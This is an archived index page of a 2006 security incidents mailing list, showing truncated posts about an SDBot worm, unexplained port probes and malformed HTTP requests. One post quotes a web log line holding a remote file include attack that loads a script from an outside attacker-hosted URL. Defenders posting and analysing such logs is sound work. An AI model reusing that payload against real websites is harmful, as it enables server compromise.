Incidents
(Page 10 of 170)
RE: RE: Worm attack on our network this morning -- anyone else see this? 2006-12-13
David Gillett (gillettdavid fhda edu)
What I've got so far is that the 7654 IRC connection is
typical of the "SDBot" family of malware.

The number of infections has stabilized -- only one new
infected machine in the last three hours. That strongly
suggests that machines with up to date patches and/or
antivirus and/or non-blank pa

http://thebesthack.altervista.org/input.txt 2006-12-13
modincidents mail securityfocus com (1 replies)

An incidents subscriber emailed me stating that they were getting the
following in their 404 logs:

PHP.asp</activate.php?language=conf&footerpage=http://thebesthack.altervista.org/input.txt?

It appears that an attacker is attempting to exploit a remote file include
vulnerability. If the attack

Re: http://thebesthack.altervista.org/input.txt 2006-12-14
Bojan Zdrnja (bojan zdrnja gmail com)
RE: Worm attack on our network this morning -- anyone else see this? 2006-12-13
David Gillett (gillettdavid fhda edu)
I neglected to mention that the "phone home" destinations
are all in the 86.x.x.x range.

Dave

> -----Original Message-----
> From: David Gillett [mailto:gillettdavid (at) fhda (dot) edu]
> Sent: Wednesday, December 13, 2006 1:05 PM
> To: 'incidents (at) securityfocus (dot) com'
> Subject: Worm attack on our networ

Re: Re: New UDP port probed (36970) 2006-12-12
rpan hotmail com (1 replies)
Is your host on DHCP? The IP could be used for B2B client in the past.

------------------------------------------------------------------------
------
This List Sponsored by: Black Hat

Attend the Black Hat Briefings & Training USA, July 29-August 3 in Las Vegas.
World renowned security experts rev

Worm attack on our network this morning -- anyone else see this? 2006-12-13
David Gillett (gillettdavid fhda edu)
RE: New UDP port probed (36970) 2006-12-11
McGowan, Jeremy (jmcgowan globalspec com)
Ares, which is a P2P Program, most likely.

-Jeremy

-----Original Message-----
From: listbounce (at) securityfocus (dot) com [mailto:listbounce (at) securityfocus (dot) com]
On Behalf Of Tim
Sent: Saturday, December 09, 2006 9:51 PM
To: Walter C. Daugherity
Cc: incidents (at) securityfocus (dot) com
Subject: Re: New UDP port prob

Re: Re: New UDP port probed (36970) 2006-12-11
w1ngz73 yahoo com
A quick google of 'UDP 36970' shows it to be a common outgoing port for remote client software. Incoming connections to this kind of port are probably some kind of probe for a specific client vulnerability.

Re: Re: New UDP port probed (36970) 2006-12-11
anonymous an as
That looks like it may be an RPC service. Try probing the boxes on 36970 (the ones that probed you), and see what you get back.

New UDP port probed (36970) 2006-12-08
Walter C. Daugherity (daugher cs tamu edu) (2 replies)
Today's log shows a new UDP port (36970) probed by

24.85.239.112
125.22.34.118
59.70.136.92
140.113.90.231

etc., and I did not find that port in various lists of ports used by viruses, Trojans, backdoors, etc.

Anybody know what this is?

--
Walter C. Daugherity

Re: New UDP port probed (36970) 2006-12-11
killy (killfactory gmail com)
Re: New UDP port probed (36970) 2006-12-10
Tim (tim-forensics sentinelchicken org)
Re: Re: Thousands of attempts to port 35825 and 11090 2006-12-06
artsspamhere shaw ca
Thanks for the replies. Perhaps I failed to mention that this is a "personal" fw/router (a Netgear FR314P) so the full packet dumps etc. that you folks are looking for aren't there. About the only question I can answer is that it was 99% UDP. The source ports seemed to be all over the place (I di

Re: Thousands of attempts to port 35825 and 11090 2006-12-05
bucklerk dsainc com
I couldn't find anything on these ports either. It's possible they're used by a trojan program.

First scan all your machines behind your router for these open ports. It's possible one of your machines has been infected with a trojan, "phoned home", and now the attacker is trying to gain access.
J

Thousands of attempts to port 35825 and 11090 2006-12-04
artsspamhere shaw ca (2 replies)
I'm seeing continuous attempts to these two ports in my router's logs. Most of the source IP addresses I looked up are in China (I'm in Canada). What are they after?!

I have searched for hours for info on these two ports and come up empty, i.e. seemingly no known exploits.

Thanks in advance,
Art

Re: Thousands of attempts to port 35825 and 11090 2006-12-06
ilaiy (ilaiy e gmail com)
Re: Thousands of attempts to port 35825 and 11090 2006-12-05
Tim (tim-forensics sentinelchicken org)
Re: Re: "Ticken" web attacks? 2006-11-17
bucklerk dsinc com (2 replies)
Oops silly me. I thought it said Tickling.
It says Ticking.
That is odd.

Re: Re: "Ticken" web attacks? 2006-11-20
K.M. Jeary (kmj1000 ucs cam ac uk) (2 replies)
Re: "Ticken" web attacks? 2006-11-20
Valdis Kletnieks vt edu
Re: "Ticken" web attacks? 2006-11-20
Radu Oprisan (radu securesystems ro)
Re: Re: "Ticken" web attacks? 2006-11-19
Dude VanWinkle (dudevanwinkle gmail com)
Re: "Ticken" web attacks? 2006-11-17
bucklerk dsainc com
Never seen that before myself.
Did a web search.
http://www.thefreedictionary.com/Ticken

Tick´en
n. 1. See Ticking.

So it looks like your machines were tickled to death. Someone has an interesting sense of humor.

spambot and dictionary attacks 2006-11-17
rowland onobrauche (rowland onobrauche legendplc com)
I would like to hear from anyone that has successfully blocked
spambots or dictionary attacks without the need of another server in
between your mailserver and the senders.
The mailserver on my end is exim and it is actually a virtual server,
so i canno

"Ticken" web attacks? 2006-11-16
Steve Friedl (steve unixwiz net) (1 replies)
Good evening, all,

A customer recently underwent a denial-of-service attack where the many
attacking machines submitted HTTP requests that consisted of nothing but

Ticken <%/%>%:|||:<&%%><<><?>

Plus the usual CR/LF + CR/LF.

Normally one would expect to find GET or POST or HEAD, followed by the

RE: "Ticken" web attacks? 2006-11-22
James C. Slora Jr. (james slora phra com)
Re: \x HTTP requests 2006-11-09
Neil Dickey (neil geol niu edu)
"Maxime Ducharme" <mducharme (at) cybergeneration (dot) com> wrote:

>I see these HTTP requests and I'm looking for more information:
>[ ... ]
>x.x.x.3 - - [08/Nov/2006:05:06:21 -0500] "\x80|\x01\x03\x01" 200 8 "-" "-"
>
>Would it be someone attempting to send an https request on my port 80?

When I see things

Copyright 2010, SecurityFocus